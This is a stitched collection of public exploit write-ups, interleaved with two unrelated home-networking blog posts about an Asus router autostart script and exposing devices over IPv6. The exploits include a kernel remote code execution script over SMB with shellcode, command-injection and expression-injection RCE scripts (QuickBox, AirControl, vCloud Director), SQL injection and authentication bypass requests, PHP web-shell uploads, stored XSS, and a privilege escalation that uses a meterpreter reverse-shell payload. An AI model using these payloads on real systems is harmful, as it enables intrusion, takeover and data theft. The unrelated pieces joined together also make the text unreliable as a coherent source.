+= b"\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff" USER_PAYLOAD += b"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86" USER_PAYLOAD += b"\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08" USER_PAYLOAD += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6" USER_PAYLOAD += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a" USER_PAYLOAD += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59" USER_PAYLOAD += b"\x41\x89\xda\xff\xd5" PML4_SELFREF = 0 PHAL_HEAP = 0 PHALP_INTERRUPT = 0 PHALP_APIC_INTERRUPT = 0 PNT_ENTRY = 0 max_read_retry = 3 overflow_val = 0x1100 write_unit = 0xd0 pmdl_va = KUSER_SHARED_DATA + 0x900 pmdl_mapva = KUSER_SHARED_DATA + 0x800 pshellcodeva = KUSER_SHARED_DATA + 0xa00 class MDL: def __init__(self, map_va, phys_addr): self.next = struct.pack("<Q", 0x0) self.size = struct.pack("<H", 0x40) self.mdl_flags = struct.pack("<H", 0x5004) self.alloc_processor = struct.pack("<H", 0x0) self.reserved = struct.pack("<H", 0x0) self.process = struct.pack("<Q", 0x0) self.map_va = struct.pack("<Q", map_va) map_va &= ~0xFFF self.start_va = struct.pack("<Q", map_va) self.byte_count = struct.pack("<L", 0x1100) self.byte_offset = struct.pack("<L", (phys_addr & 0xFFF) + 0x4) phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12 self.phys_addr1 = struct.pack("<Q", phys_addr_enc) self.phys_addr2 = struct.pack("<Q", phys_addr_enc) self.phys_addr3 = struct.pack("<Q", phys_addr_enc) def raw_bytes(self): mdl_bytes = self.next + self.size + self.mdl_flags + \ self.alloc_processor + self.reserved + self.process + \ self.map_va + self.start_va + self.byte_count + \ self.byte_offset + self.phys_addr1 + self.phys_addr2 + \ self.phys_addr3 return mdl_bytes def reconnect(ip, port): sock = socket.socket(socket.AF_INET) sock.settimeout(7) sock.connect((ip, port)) return sock def write_primitive(ip, port, data, addr): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) uncompressed_data = b"\x41"*(overflow_val - len(data)) uncompressed_data += b"\x00"*PNET_RAW_BUFF_OFFSET uncompressed_data += struct.pack('<Q', addr) compressed_data = compress(uncompressed_data) smb_compress(sock, compressed_data, 0xFFFFFFFF, data) sock.close() def write_srvnet_buffer_hdr(ip, port, data, offset): sock = reconnect(ip, port) smb_negotiate(sock) sock.recv(1000) compressed_data = compress_evil(data) dummy_data = b"\x33"*(overflow_val + offset) smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data) sock.close() def read_physmem_primitive(ip, port, phys_addr): i = 0 while i < max_read_retry: i += 1 buff = try_read_physmem_primitive(ip, port, phys_addr) if buff is not None: return buff def try_read_physmem_primitive(ip, port, phys_addr): fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes() write_primitive(ip, port, fake_mdl, pmdl_va) write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET) i = 0 while i < max_read_retry: i += 1 sock = reconnect(ip, port) smb_negotiate(sock) buff = sock.recv(1000) sock.close() if buff[4:8] != b"\xfeSMB": return buff def get_phys_addr(ip, port, va_addr): pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1))) pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1))) pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1))) pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1))) pml4e = PML4 + pml4_index*0x8 pdpt_buff = read_physmem_primitive(ip, port, pml4e) if pdpt_buff is None: sys.exit("[-] physical read primitive failed") pdpt = struct.unpack("<Q", pdpt_buff[0:8])[0] & 0xFFFFF000 pdpte = pdpt + pdpt_index*0x8 pdt_buff = read_physmem_primitive(ip, port, pdpte) if pdt_buff is None: sys.exit("[-] physical read primitive failed") pdt = struct.unpack("<Q", pdt_buff[0:8])[0] & 0xFFFFF000 pdte = pdt + pdt_index*0x8 pt_buff = read_physmem_primitive(ip, port, pdte) if pt_buff is None: sys.exit("[-] physical read primitive failed") pt = struct.unpack("<Q", pt_buff[0:8])[0] if pt & (1 << (8 - 1)): phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF) return phys_addr else: pt = pt & 0xFFFFF000 pte = pt + pt_index*0x8 pte_buff = read_physmem_primitive(ip, port, pte) if pte_buff is None: sys.exit("[-] physical read primitive failed") phys_addr = (struct.unpack("<Q", pte_buff[0:8])[0] & 0xFFFFF000) + \ (va_addr & 0xFFF) return phys_addr def get_pte_va(addr): pt = addr >> 9 lb = (0xFFFF << 48) | (PML4_SELFREF << 39) ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8 pt = pt | lb pt = pt & ub return pt def overwrite_pte(ip, port, addr): phys_addr = get_phys_addr(ip, port, addr) buff = read_physmem_primitive(ip, port, phys_addr) if buff is None: sys.exit("[-] read primitive failed!") pte_val = struct.unpack("<Q", buff[0:8])[0] # Clear NX bit overwrite_val = pte_val & (((1 << 63) - 1)) overwrite_buff = struct.pack("<Q", overwrite_val) write_primitive(ip, port, overwrite_buff, addr) def build_shellcode(): global KERNEL_SHELLCODE KERNEL_SHELLCODE += struct.pack("<Q", PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET) KERNEL_SHELLCODE += struct.pack("<Q", PHALP_APIC_INTERRUPT) KERNEL_SHELLCODE += struct.pack("<Q", PNT_ENTRY & 0xFFFFFFFFFFFFF000) KERNEL_SHELLCODE += USER_PAYLOAD def search_hal_heap(ip, port): global PHALP_INTERRUPT global PHALP_APIC_INTERRUPT search_len = 0x10000 index = PHAL_HEAP page_index = PHAL_HEAP cons = 0 phys_addr = 0 while index < PHAL_HEAP + search_len: # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, # so we try to reduce number of reads like this if not (index & 0xFFF): phys_addr = get_phys_addr(ip, port, index) else: phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF) buff = read_physmem_primitive(ip, port, phys_addr) if buff is None: sys.exit("[-] physical read primitive failed!") entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1) i = 0 # This heuristic seems to be OK to find HalpInterruptController, but could use improvement while i < entry_indices: entry = struct.unpack("<Q", buff[i:i+8])[0] i += 8 if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000: cons = 0 continue cons += 1 if cons > 3: PHALP_INTERRUPT = index + i - 0x40 print("[+] found HalpInterruptController at %lx" % PHALP_INTERRUPT) if len(buff) < i + 0x40: buff = read_physmem_primitive(ip, port, index + i + 0x38) PHALP_APIC_INTERRUPT = struct.unpack("<Q", buff[0:8])[0] if buff is None: sys.exit("[-] physical read primitive failed!") else: PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0] print("[+] found HalpApicRequestInterrupt at %lx" % PHALP_APIC_INTERRUPT) return index += entry_indices sys.exit("[-] failed to find HalpInterruptController!") def search_selfref(ip, port): search_len = 0x1000 index = PML4 while search_len: buff = read_physmem_primitive(ip, port, index) if buff is None: return entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1) i = 0 while i < entry_indices: entry = struct.unpack("<Q",buff[i:i+8])[0] & 0xFFFFF000 if entry == PML4: return index + i i += 8 search_len -= entry_indices index += entry_indices def find_pml4_selfref(ip, port): global PML4_SELFREF self_ref = search_selfref(ip, port) if self_ref is None: sys.exit("[-] failed to find PML4 self reference entry!") PML4_SELFREF = (self_ref & 0xFFF) >> 3 print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF) def find_low_stub(ip, port): global PML4 global PHAL_HEAP global PNT_ENTRY limit = 0x100000 index = 0x1000 while index < limit: buff = read_physmem_primitive(ip, port, index) if buff is None: sys.exit("[-] physical read primitive failed!") entry = struct.unpack("<Q", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF if entry == LOWSTUB_JMP: print("[+] found low stub at phys addr %lx!" % index) PML4 = struct.unpack("<Q", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0] print("[+] PML4 at %lx" % PML4) PHAL_HEAP = struct.unpack("<Q", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000 print("[+] base of HAL heap at %lx" % PHAL_HEAP) buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET) if buff is None: sys.exit("[-] physical read primitive failed!") PNT_ENTRY = struct.unpack("<Q", buff[0:8])[0] print("[+] ntoskrnl entry at %lx" % PNT_ENTRY) return index += 0x1000 sys.exit("[-] Failed to find low stub in physical memory!") def do_rce(ip, port): find_low_stub(ip, port) find_pml4_selfref(ip, port) search_hal_heap(ip, port) build_shellcode() print("[+] built shellcode!") pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA) print("[+] KUSER_SHARED_DATA PTE at %lx" % pKernelUserSharedPTE) overwrite_pte(ip, port, pKernelUserSharedPTE) print("[+] KUSER_SHARED_DATA PTE NX bit cleared!") # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function. to_write = len(KERNEL_SHELLCODE) write_bytes = 0 while write_bytes < to_write: write_sz = min([write_unit, to_write - write_bytes]) write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes) write_bytes += write_sz print("[+] Wrote shellcode at %lx!" % pshellcodeva) input("[+] Press a key to execute shellcode!") write_primitive(ip, port, struct.pack("<Q", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET) print("[+] overwrote HalpInterruptController pointer, should have execution shortly...") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-ip", help="IP address of target", required=True) parser.add_argument("-p", "--port", default=445, help="SMB port, \ default: 445", required=False, type=int) args = parser.parse_args() do_rce(args.ip, args.port)

# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution # Date: 2020-05-26 # Exploit Author: s1gh # Vendor Homepage: https://quickbox.io/ # Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/ # Version: <= 2.1.8 # Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules. # Tested on: Debian 9 # CVE: CVE-2020-13448 # References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE ''' Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways. 1. sudo mysql -e '\! /bin/sh' 2. sudo mount -o bind /bin/sh /bin/mount;sudo mount ''' #!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests import argparse import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning from urllib.parse import quote_plus requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def exploit(args): s = requests.Session() print('[*] Sending our payload...') s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False) try: s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False) except requests.exceptions.ReadTimeout: pass def main(): parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8") parser.add_argument('-i',dest='ip',required=True,help="Target IP Address") parser.add_argument('-u',dest='username',required=True,help="Username") parser.add_argument('-p',dest='password',required=True,help="Password") parser.add_argument('-c',dest='cmd', required=True, help="Command to execute") args = parser.parse_args() exploit(args) if __name__ == '__main__': main() sys.exit(0)

# Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated) # Date: 2020-06-01 # Exploit Author: Kailash Bohara # Vendor Homepage: https://www.opencart.com # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: OpenCart < 3.0.3.2 # CVE : CVE-2020-10596 1. Go to localhost.com/opencart/admin and login with credentials. 2. Then navigate to System>Users>Users and click on Action button on top right corner. 3. Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload "><svg onload=alert("XSS")> and then upload it as new user profile image. 4. After the upload completes the XSS pop-up executes as shown below and it will gets executed each time someone visits the Image manager section.

# Exploit Title: Clinic Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/source%20code/login.php POST /source%20code/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 72 Referer: http://localhost/source%20code/login.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined HTTP/1.1 200 OK Date: Mon, 01 Jun 2020 19:52:17 GMT Server: Apache/2.4.39 (Win64) PHP/7.2.18 X-Powered-By: PHP/7.2.18 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 4726 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

In the previous article, I talked about how to install alist using Asus router. However, it is impossible to start up automatically. Now the solution is as follows nvram set jffs2_on=1 nvram set jffs2_enable=1 nvram set jffs2_format=1 nvram set script_usbmount='sh /tmp/mnt/ASUS/asus.sh' nvram commit After the service reboot is restarted, we can use the nvram show | grep script command to view it. If there is our script power behind script_usbmount, it will be successful.

# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution # Date: 2020-06-03 # Exploit Author: 0xd0ff9 vs j3ssie # Vendor Homepage: https://www.ui.com/ # Software Link: https://www.ui.com/download/#!utilities # Version: AirControl <= 1.4.2 # Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml import requests import re import urllib import sys print """USAGE: python exploit_aircontrol.py [url] [cmd]""" url = sys.argv[1] cmd = sys.argv[2] burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}" burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"} r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False) Locat = r.headers["Location"] res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1) print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)

#!/usr/bin/python # Exploit Title: vCloud Director - Remote Code Execution # Exploit Author: Tomas Melicher # Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ # Date: 2020-05-24 # Vendor Homepage: https://www.vmware.com/ # Software Link: https://www.vmware.com/products/cloud-director.html # Tested On: vCloud Director 9.7.0.15498291 # Vulnerability Description: # VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. import argparse # pip install argparse import base64, os, re, requests, sys if sys.version_info >= (3, 0): from urllib.parse import urlparse else: from urlparse import urlparse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" session = requests.Session() def login(url, username, password, verbose): target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) res = session.get(target_url) match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) if match: tenant = match.group(1) else: print('[!] can\'t find tenant identifier') return (None,None,None,None) if verbose: print('[*] tenant: %s'%(tenant)) match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) if match: # Cloud Director 9.* login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) res = session.post(login_url, data={'username':username,'password':password}) if res.status_code == 401: print('[!] invalid credentials') return (None,None,None,None) else: # Cloud Director 10.* match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) if match: login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) headers = { 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), 'Accept': 'application/json;version=29.0', 'Content-type': 'application/json;version=29.0' } res = session.post(login_url, headers=headers) if res.status_code == 401: print('[!] invalid credentials') return (None,None,None,None) else: print('[!] url for login form was not found') return (None,None,None,None) cookies = session.cookies.get_dict() jwt = cookies['vcloud_jwt'] session_id = cookies['vcloud_session_id'] if verbose: print('[*] jwt token: %s'%(jwt)) print('[*] session_id: %s'%(session_id)) res = session.get(target_url) match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) if match is None: print('[!] organization not found') return (None,None,None,None) organization = match.group(1) if verbose: print('[*] organization name: %s'%(organization)) match = re.search(r'orgId : \'([^\']+)', res.content) if match is None: print('[!] orgId not found') return (None,None,None,None) org_id = match.group(1) if verbose: print('[*] organization identifier: %s'%(org_id)) return (jwt,session_id,organization,org_id) def exploit(url, username, password, command, verbose): (jwt,session_id,organization,org_id) = login(url, username, password, verbose) if jwt is None: return headers = { 'Accept': 'application/*+xml;version=29.0', 'Authorization': 'Bearer %s'%jwt, 'x-vcloud-authorization': session_id } admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) res = session.get(admin_url, headers=headers) match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE) if match: version = match.group(1) if verbose: print('[*] detected version of Cloud Director: %s'%(version)) else: version = None print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>' data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>' data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>' data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload) data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>' res = session.put(email_settings_url, data=data, headers=headers) match = re.search(r'value:\s*\[([^\]]+)\]', res.content) if verbose: print('') try: print(base64.b64decode(match.group(1))) except Exception: print(res.content) parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') parser.add_argument('-v', action='store_true') parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) parser.add_argument('-u', metavar='username', required=True) parser.add_argument('-p', metavar='password', required=True) parser.add_argument('-c', metavar='command', help='command to execute', default='id') args = parser.parse_args() url = urlparse(args.t) exploit(url, args.u, args.p, args.c, args.v)

# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) # Date: 2020-06-02 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://phpgurukul.com/hostel-management-system/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210 # Version: 2.0 # Tested on: Windows 10 - Wamp Server --Vulnerable file /full-profile.php --Vulnerable code; $ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'"); Id parameter's value is going into sql query directly! --Proof Of Concept sqlmap -u "http://TARGET/hostel/full-profile.php?id=6" OR http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error

# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution # Google Dork: N/A # Date: 2020-06-02 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. # vulnerable file : manage_website.php # Details: login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user. change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file. path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php # Proof of Concept: http://localhost/source%20code/manage_website.php POST /source%20code/manage_website.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------135192786613366 Content-Length: 2539 Referer: http://localhost/source%20code/manage_website.php Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 Connection: keep-alive Upgrade-Insecure-Requests: 1 -----------------------------58631544014332: undefined Content-Disposition: form-data; name="title" -----------------------------58631544014332 Content-Disposition: form-data; name="short_title" -----------------------------58631544014332 Content-Disposition: form-data; name="footer" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_code" -----------------------------58631544014332 Content-Disposition: form-data; name="currency_symbol" -----------------------------58631544014332 Content-Disposition: form-data; name="old_website_image" logo for hospital system.jpg -----------------------------58631544014332 Content-Disposition: form-data; name="website_image"; filename="shell.php" Content-Type: application/octet-stream <?php echo shell_exec($_GET["cmd"]); ?>

# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path # Author: Gobinathan L # Date: 2020-06-03 # Vendor Homepage: https://www.iobit.com # Software Link: https://www.iobit.com/en/advanceduninstaller.php # Version : 9.5.0.15 # Tested on: Windows 10 64bit(EN) About Unquoted Service Path : ============================== When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). Steps to recreate : ============================= 1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2. The Vulnerable Service would Show up. 3. Check the Service Permissions by typing [ sc qc IObitUnSvr ] 4. The command would return.. C:\>sc qc IObitUnSvr [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IObitUnSvr TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IObit Uninstaller Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem 5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine" 6. Now create a Payload with msfvenom or other tools and name it to IObit.exe 7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory. 8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory. 9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ] 10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege]. During my testing : Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ] # Disclaimer : ========================= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

In this article, we will learn how to expose local devices to the public network through IPv6 addresses without a public network IP. Of course, exposing local equipment to the public network is a certain risk. If there are no certain business requirements, try not to expose the equipment. In the past, my family's intranet devices were port mapped through FRP to enable access to intranet devices. However, due to the limitation of the IP bandwidth of the public network server, the accessibility and stability are poor. Therefore, we can use IPv6 to completely solve the problem. Experimental Environment Home network supports IPV6(*)Centos7 (intranet device) PC domain name (optional) Verify ipv6 network We visit https://www.test-ipv6.com/to verify whether the current network supports IPv6. If you support it, you can have fun. If it is not supported, please try the following solution. Solution 1: Computers or public network devices are directly connected to Lightmao or Lightmao WiFi (currently, operators have basically achieved the popularization of IPv6). Then test again! Of course, the disadvantages are also obvious. Due to the limited performance of Light Cat, the network performance cannot be performed well. The router becomes a decoration! Solution 2 First, find a way to get the super administrator password of Guangmao. You can refer to my previous article 《利用burp破解光猫密码》 《用小翼管家获取密码》 After obtaining the super administrator password, log in to the Guangmao background. Settings are as follows. Then log in to the router and set the Internet access method to dial-up Internet access (PPPOE) IPV6 mode is set to automatically obtain (different types of routers, the methods may be different) After completion, test again to see if IPv6 is supported. Connection Test After the solution is completed, we can log in to the local device and check the local IPv6 address. Centos7 enters the command ifconfig in the terminal, as shown in the figure below, which is the IPv address of the local device. Enter the ipconfig command for Windows to view. The connection is similar to ipv4. When connecting, we need to enclose the ipv6 address in []. For example, http://[xx:xx:xxx]:80 ssh root@[xx:xx:xxx] Configure domain name Because the IPv6 address is difficult to remember, we can use the domain name to parse it. Here we take Alibaba Cloud as an example. The effect is as follows Dynamic Analysis Because the obtained IP address is dynamic, the IP address will change after the optical module restarts or after a period of time. Therefore, we need to dynamically parse it, and automatically parse it to the domain name when the IP address changes. First of all, we need to apply for AccessKeyId and Access Key Secret on the Alibaba Cloud Console. Here, I used the open source project https://github.com/jeessy2/ddns-go Download and start according to system type sudo ./ddns-go -s install then access http://127.0.0.01:9876/config. View log That's it. Configuration is complete. When our ipv6 address changes, it will also automatically update to the domain name resolution. About bandwidth The bandwidth is related to your network card. The author's broadband is an ordinary family. Download files and watch videos on the network disk without any lag. Precautions The site only supports IPV6 network access. If your site does not support ipv6, it cannot be accessed. Because you exposed your local devices to the public network. Therefore, it is necessary to strengthen equipment safety. Because the operator blocks ports such as 80 and other ports, you can add other ports behind the domain name http://[ip]: port number for mobile phones can access ipv6web sites through traffic and need to modify monitoring.

# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection # Google Dork: inurl:/eotools_share/ # Date: 2020-06-03 # Exploit Author: TSAR # Vendor Homepage: http://www.oriolespinal.es/eowd # Software Link: http://www.oriolespinal.es/eotools # Version: ALL VERSION UP TO LATEST # Tested on: MACOS 10.11.2 # CVE : NOt YET [1]########### SQl INJECTION ########### Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10-- [2]########### SQl INJECTION ########### Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable: POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1 Host: victim.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556 Content-Length: 740 Connection: close Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: image/png PNG; ********************************/ ********************************/ GIF89a; ********************/ ********************/<?php $_GET[d]($_GET[dd]); ?> -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="categoria" pdfs -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="descripcion" 123 -----------------------------165073870416097602871919119556 Content-Disposition: form-data; name="submit" upload -----------------------------165073870416097602871919119556-- the shell path is: 